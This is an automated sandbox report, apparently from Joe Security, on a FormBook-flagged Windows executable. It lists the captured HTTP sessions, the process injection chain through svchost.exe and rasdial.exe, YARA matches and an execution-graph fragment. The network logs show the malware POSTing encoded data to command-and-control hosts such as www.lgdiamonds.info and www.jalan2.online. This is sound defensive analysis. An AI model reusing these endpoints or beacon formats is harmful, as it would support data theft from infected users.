                                                      Data Ascii: grix=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5ntg00zirQMSc4uvCZg9XJf/of65XKQDi8qIprDxhCbNjRrzaLvbSTvd3e6dEUP4+Q//uSNaPzwA+QRsrexv6+HKSOeH7bYKCP7wviPSxCxm0+k+yOPuRZWTJ6yxdayErb+Oj0M1yYIyxJdAYofD16jPo1z/aOdey4oX8Hp35lMnL5+a6IZVUbepww==
                                                       Jan 10, 2025 21:47:44.325855970 CET | 322 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:44 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       11 | 192.168.2.6 | 49998 | 130.185.109.77 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:46.263134003 CET | 1785 | OUT | POST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6d 56 67 30 6d 4c 69 71 78 4d 53 64 34 75 76 42 5a 68 61 58 4a 65 6e 6f 66 53 39 58 4b 56 34 69 2b 69 49 6d 75 58 78 6f 51 7a 4e 74 52 72 7a 54 72 76 50 57 54 76 49 33 65 71 5a 45 55 66 34 2b 51 2f 2f 75 52 56 61 59 79 77 41 74 67 52 6a 6a 2b 78 64 77 75 48 69 53 4b 7a 6c 37 62 4d 67 43 38 7a 77 75 43 66 53 69 41 70 6d 32 65 6b 38 78 4f 50 6d 52 5a 4b 41 4a 2b 53 4c 64 66 6d 2b 72 63 4f 4f 68 44 35 57 6f 72 31 75 6e 61 68 6a 45 66 6e 47 74 50 54 6f 77 46 79 41 52 74 68 4f 7a 34 34 37 77 67 56 76 39 30 35 5a 43 49 43 78 77 2b 49 6c 65 62 7a 6c 73 30 75 4b 70 4a 55 2f 44 45 75 68 4d 73 55 36 63 37 53 43 78 33 59 51 68 56 4b 51 6a 41 38 48 48 39 5a 65 73 2b 74 30 75 34 35 35 55 75 48 47 75 58 66 35 59 2b 50 48 67 49 50 67 6a 54 46 6e 4e 42 42 45 59 62 2f 52 78 6e 62 6f 59 55 37 63 2f 62 36 44 78 54 79 73 78 4c 50 57 34 49 75 45 6c 48 35 4d 45 35 6a 6b 7a 30 39 48 64 [TRUNCATED]
                                                      Data Ascii: grix=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5mVg0mLiqxMSd4uvBZhaXJenofS9XKV4i+iImuXxoQzNtRrzTrvPWTvI3eqZEUf4+Q//uRVaYywAtgRjj+xdwuHiSKzl7bMgC8zwuCfSiApm2ek8xOPmRZKAJ+SLdfm+rcOOhD5Wor1unahjEfnGtPTowFyARthOz447wgVv905ZCICxw+Ilebzls0uKpJU/DEuhMsU6c7SCx3YQhVKQjA8HH9Zes+t0u455UuHGuXf5Y+PHgIPgjTFnNBBEYb/RxnboYU7c/b6DxTysxLPW4IuElH5ME5jkz09HdKLSqBZFXN7MUkEEkrGZCL+Lrm0Ui0dO71FdXawGQPSIxTbmsRAGMHmbmO4sbvIk/nONmSYkbj4559MZySWoEaWzfNoTTRFYY2KEiFH5y5KEU7GLmGpCLvisJrS2w4a93VZUPN7o0GAgVNYLm+2jlMFx9FkeBX6oD2VyO2GRcXfzOxVjWb+75rSAowtRne/emI43lE68t2I0AGJnC1ToIpfq1/qPJIUrW4h55gi0j4ebIPiZUfJ9gt0LsSHPWiTJBiYdG4TlW2cQ0Avbdr+JJfXf59QeyDPTSMqPbhyCK+JukmQCYULMqarb7Gddr84e7J+oVIZq5J+BLfmIIZkhSkS8IBizL6kp57W1+KRVcrft5ZrV2ddH5Jd4pekB87kSYwSA+C1t7rus0UwsrNGKC7LY3WawfOH5V4NInSUl67snegCvHw6YF8eES1BmWV0K5oI4odOx37cuJEItwmO42gYt9xpdTi6qm6wyrEe26u5wvKsgD5C3RunzIQ2QPrY+LXd5FkNVoTb9gdsp6sXDBQVOYQSZXEq9XZWYCw09T3BMreGjx/HoTG+oDjrRyXWwtczshLOlCt1ovAZyEFh3dUrQxP3tTwbA2m+B9Nx3oND79IV6Pi9P+zbpYDKxJIgcxVQueRWed0InEtxyiUxFvpYfFI7ELBSLcPi [TRUNCATED]
                                                       Jan 10, 2025 21:47:46.910240889 CET | 322 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:46 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       12 | 192.168.2.6 | 49999 | 130.185.109.77 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:48.802963018 CET | 486 | OUT | GET /cv1w/?grix=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetXnoSoSOcAqJ+evnJHX5lUu5kxQtYxAyoUFY891atvjjNtDr6f0=&jxk=HtO4sxDXWj2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.lgdiamonds.info
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                       Jan 10, 2025 21:47:49.476176977 CET | 317 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 20:47:49 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 168
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                       13 | 192.168.2.6 | 50000 | 108.181.189.7 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Jan 10, 2025 21:47:54.531306982 CET | 742 | OUT | POST /lvda/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 209
                                                      Host: www.jalan2.online
                                                      Origin: http://www.jalan2.online
                                                      Referer: http://www.jalan2.online/lvda/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 67 72 69 78 3d 4a 4a 72 79 55 68 4f 30 67 6d 71 6c 6e 2b 68 5a 78 4d 6a 2f 6c 42 38 48 6f 43 31 38 70 74 67 32 6d 61 52 6c 41 58 32 62 65 64 66 72 79 7a 4f 34 4d 67 7a 6c 6f 6b 58 47 2f 72 48 7a 6c 36 6f 53 32 50 78 77 77 54 39 73 66 51 4f 4d 44 66 54 4e 45 4b 75 72 70 4c 42 2f 42 73 45 31 58 48 58 6d 6f 2b 33 41 6e 54 68 44 41 75 59 6e 44 35 74 2b 31 41 72 72 59 52 6b 57 36 30 77 6b 41 44 62 72 52 55 46 66 4f 63 69 79 39 48 4c 77 35 59 52 62 6d 49 6d 5a 76 33 37 63 6e 39 52 76 6c 4a 68 6a 74 47 70 48 42 6b 6e 64 44 35 30 2f 46 64 44 34 54 43 34 47 76 67 73 79 74 2f 72 38 4d 79 37 4c 5a 58 4d 74 77 41 58 66 69 4a 79 33
                                                      Data Ascii: grix=JJryUhO0gmqln+hZxMj/lB8HoC18ptg2maRlAX2bedfryzO4MgzlokXG/rHzl6oS2PxwwT9sfQOMDfTNEKurpLB/BsE1XHXmo+3AnThDAuYnD5t+1ArrYRkW60wkADbrRUFfOciy9HLw5YRbmImZv37cn9RvlJhjtGpHBkndD50/FdD4TC4Gvgsyt/r8My7LZXMtwAXfiJy3
                                                       Jan 10, 2025 21:47:55.120342016 CET | 987 | IN | HTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      date: Fri, 10 Jan 2025 20:47:55 GMT
                                                      server: LiteSpeed
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      transfer-encoding: chunked
                                                      connection: close
                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED]
                                                      Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a
                                                       Jan 10, 2025 21:47:55.123480082 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      14 | 192.168.2.6 | 50001 | 108.181.189.7 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jan 10, 2025 21:47:57.076729059 CET | 766 | OUT | POST /lvda/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 233
                                                      Host: www.jalan2.online
                                                      Origin: http://www.jalan2.online
                                                      Referer: http://www.jalan2.online/lvda/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Ascii: grix=JJryUhO0gmql2tpZ3vL/0x8E2S1889h/madlAWCLevrrzS+4Njrl9kXG3LH2h6oN2P9ewSBsfQaMDfjNE9ysvbBHJME7THXmo+3AnT0mAvwnDId+1hrsGBkRyUwkKjbvRUFhOYrl9Ezw5YBbmcyag37gj9RktLISr3okJ3LbeLI3EreiPx4l9wMwt9zOMS7hbX0tiXb4t9XUpxBJrbZTNLX6nEiyGIOlmw==
                                                      Jan 10, 2025 21:47:57.636166096 CET | 987 | IN | HTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      date: Fri, 10 Jan 2025 20:47:57 GMT
                                                      server: LiteSpeed
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      transfer-encoding: chunked
                                                      connection: close
                                                      Jan 10, 2025 21:47:57.636430025 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      15 | 192.168.2.6 | 50002 | 108.181.189.7 | 80 | 3524 | C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jan 10, 2025 21:47:59.623163939 CET | 1779 | OUT | POST /lvda/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1245
                                                      Host: www.jalan2.online
                                                      Origin: http://www.jalan2.online
                                                      Referer: http://www.jalan2.online/lvda/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 21:48:00.159053087 CET | 279 | IN | HTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      date: Fri, 10 Jan 2025 20:48:00 GMT
                                                      server: LiteSpeed
                                                      content-encoding: gzip
                                                      vary: Accept-Encoding
                                                      transfer-encoding: chunked
                                                      connection: close
                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                      Data Ascii: a


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      16 | 192.168.2.6 | 50003 | 108.181.189.7 | 80
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Jan 10, 2025 21:48:02.960645914 CET | 484 | OUT | GET /lvda/?grix=ELDSXX2RsHX+gMhDzPeoz2Qv1CIr49o7uMJ0P3epR9C3wBGcH3Oc/iCy84j3rr0M4JJUpyIPXVKNA8OpCuWYnK4KGJgudRTv/NyY6RpnXIZyD5kBpznzTkEusFk7ThvsJGVoHcI=&jxk=HtO4sxDXWj2 HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.jalan2.online
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 21:48:03.513480902 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      content-type: text/html
                                                      cache-control: private, no-cache, max-age=0
                                                      pragma: no-cache
                                                      content-length: 1249
                                                      date: Fri, 10 Jan 2025 20:48:03 GMT
                                                      server: LiteSpeed
                                                      connection: close
                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, [TRUNCATED]
                                                      Jan 10, 2025 21:48:03.513495922 CET | 224 | IN | Data Ascii: 3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>



                                                      Target ID:0
                                                      Start time:15:45:55
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\fFoOcuxK7M.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\fFoOcuxK7M.exe"
                                                      Imagebase:0xc0000
                                                      File size:1'227'776 bytes
                                                      MD5 hash:72FC342138F06B0DFD4C6BDD3EDD676D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:15:45:58
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\fFoOcuxK7M.exe"
                                                      Imagebase:0x4c0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2455586677.0000000003560000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2455105837.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2456155033.0000000004800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:6
                                                      Start time:15:46:20
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe"
                                                      Imagebase:0xd00000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3385516192.0000000003BF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:15:46:22
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\rasdial.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                      Imagebase:0x2a0000
                                                      File size:19'456 bytes
                                                      MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3384177581.0000000002AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3385458090.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3381605146.0000000002810000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:15:46:34
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\UQrOmlNSWlnadLHLvPfhbWasuCYMYpHGZDkOZqrazBNMDeNbFDDzDYFvBQnXfmMQmVYuONmYVUbvURE\TrOCMVbhcDRPP.exe"
                                                      Imagebase:0xd00000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3387326168.0000000005100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:15:46:46
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff728280000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true


                                                        Execution Graph

                                                        Execution Coverage:3.6%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:7.9%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:67
101469->101529 101530 13cfdf 61 API calls 2 library calls 101469->101530 101471 13cfa4 101471->101467 101475 13cfb8 FreeLibrary 101471->101475 101472 13ce6b 101544 13d649 107 API calls _free 101472->101544 101475->101467 101477 13ce7c 101477->101471 101478 c9d3c 60 API calls 101477->101478 101545 c8d40 59 API calls Mailbox 101477->101545 101547 13d649 107 API calls _free 101477->101547 101478->101477 101480 c984b 101479->101480 101481 c9851 101479->101481 101480->101467 101497 13d7a5 101480->101497 101482 ff5d3 __i64tow 101481->101482 101483 c9899 101481->101483 101485 c9857 __itow 101481->101485 101489 ff4da 101481->101489 101548 e3698 83 API calls 3 library calls 101483->101548 101487 e0db6 Mailbox 59 API calls 101485->101487 101490 c9871 101487->101490 101488 ff552 Mailbox _wcscpy 101549 e3698 83 API calls 3 library calls 101488->101549 101489->101488 101491 e0db6 Mailbox 59 API calls 101489->101491 101490->101480 101492 c7de1 59 API calls 101490->101492 101493 ff51f 101491->101493 101492->101480 101494 e0db6 Mailbox 59 API calls 101493->101494 101495 ff545 101494->101495 101495->101488 101496 c7de1 59 API calls 101495->101496 101496->101488 101498 c7e4f 59 API calls 101497->101498 101499 13d7c0 CharLowerBuffW 101498->101499 101550 11f167 101499->101550 101503 c7667 59 API calls 101504 13d7f9 101503->101504 101557 c784b 101504->101557 101506 13d810 101507 c7d2c 59 API calls 101506->101507 101508 13d81c Mailbox 101507->101508 101509 13d858 Mailbox 101508->101509 101570 13cfdf 61 API calls 2 library calls 101508->101570 101509->101469 101511 13c989 101510->101511 101512 13c9de 101510->101512 101513 e0db6 Mailbox 59 API calls 101511->101513 101516 13da50 101512->101516 101515 13c9ab 101513->101515 101514 e0db6 Mailbox 59 API calls 101514->101515 101515->101512 101515->101514 101517 13dc79 Mailbox 101516->101517 101521 13da73 _strcat _wcscpy __NMSG_WRITE 101516->101521 101517->101457 101518 c9b98 59 API calls 101518->101521 101519 c9be6 59 API calls 101519->101521 
101520 c9b3c 59 API calls 101520->101521 101521->101517 101521->101518 101521->101519 101521->101520 101522 e571c 58 API calls __crtGetStringTypeA_stat 101521->101522 101523 c9837 84 API calls 101521->101523 101574 125887 61 API calls 2 library calls 101521->101574 101522->101521 101523->101521 101526 e0c1d 101525->101526 101527 e0cb5 VirtualProtect 101526->101527 101528 e0c83 101526->101528 101527->101528 101528->101460 101528->101461 101529->101469 101530->101469 101531->101465 101533 c92d6 101532->101533 101534 e0db6 Mailbox 59 API calls 101533->101534 101535 c92e4 101534->101535 101536 c92f0 101535->101536 101575 c91fc 59 API calls Mailbox 101535->101575 101538 c9050 101536->101538 101576 c9160 101538->101576 101540 e0db6 Mailbox 59 API calls 101542 c90fb 101540->101542 101541 c905f 101541->101540 101541->101542 101542->101477 101543 c8d40 59 API calls Mailbox 101542->101543 101543->101472 101544->101477 101545->101477 101546->101449 101547->101477 101548->101485 101549->101482 101551 11f192 __NMSG_WRITE 101550->101551 101552 11f1d1 101551->101552 101555 11f1c7 101551->101555 101556 11f278 101551->101556 101552->101503 101552->101508 